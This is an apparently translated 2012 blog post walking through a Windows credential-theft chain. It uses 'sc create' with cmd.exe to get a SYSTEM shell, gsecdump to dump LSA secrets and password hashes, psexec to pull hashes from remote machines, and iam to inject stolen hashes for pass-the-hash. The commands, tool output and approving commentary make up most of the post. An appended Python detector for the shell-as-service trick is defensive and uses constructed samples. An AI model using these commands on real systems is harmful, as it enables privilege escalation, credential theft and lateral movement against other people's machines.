Hash injection attack

Posted on 2012-11-6 21:09:29

To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hash information just grabbed with gsecdump into the local lsass process, which gives you the hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, don't actually need to be cracked at all; it is just a matter of using the tool. As the original article puts it, whether the password is set to 4 characters or 127, once you have the hash it is 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
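As an added defensive example (not code from the post or from the blog it quotes): a small Python detector that flags the pattern shown above, a command interpreter registered as an interactive LocalSystem service. It assumes Windows System log event 7045 ("A service was installed in the system") has been exported to a one-line record format of my own choosing, and all records are constructed samples.

```python
"""Detection sketch for the 'sc create ... cmd.exe /K start' SYSTEM-shell trick.
Assumption (not from the post): System log event 7045 ("A service was installed")
exported as one-line records (constructed sample format):
    7045 name=<service> path="<binpath>" type=<service type> account=<account>
"""
import re
import shlex

# Interpreters that should never be registered as a service binary on their own.
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
RECORD_RE = re.compile(
    r'^7045 name=(?P<name>\S+) path="(?P<path>[^"]*)" type=(?P<type>\S+) account=(?P<account>\S+)$'
)

def classify(record):
    """Return the reasons a record looks like a shell-as-service install ([] if clean)."""
    m = RECORD_RE.match(record)
    if not m:
        return []
    argv = shlex.split(m.group("path"), posix=False)  # non-posix: keep path backslashes
    exe = argv[0].strip('"').rsplit("\\", 1)[-1].lower() if argv else ""
    reasons = []
    if exe in SHELL_BINARIES:
        reasons.append(f"service binary is a command interpreter ({exe})")
    if exe == "cmd.exe" and any(a.lower() in ("/k", "/c") for a in argv[1:]):
        reasons.append("cmd.exe run with /K or /C: the 'service' is really a command line")
    if m.group("type").lower() == "interactive":
        reasons.append("interactive service (SERVICE_INTERACTIVE_PROCESS) installed")
    if reasons and m.group("account").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons

def scan(records):
    """Return [(service name, reasons)] for every record that triggers."""
    hits = []
    for rec in records:
        reasons = classify(rec)
        if reasons:
            hits.append((RECORD_RE.match(rec).group("name"), reasons))
    return hits

# Constructed samples: one normal install, and the shellcmdline service from the post.
SAMPLE_RECORDS = [
    '7045 name=Spooler path="C:\\WINDOWS\\system32\\spoolsv.exe" type=own account=LocalSystem',
    '7045 name=shellcmdline path="C:\\WINDOWS\\system32\\cmd.exe /K start" type=interactive account=LocalSystem',
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_RECORDS):
        print(name, "->", "; ".join(reasons))
```

The same checks apply to a Sysmon or EDR process-creation feed by matching on `services.exe` spawning `cmd.exe`; only the record parser changes.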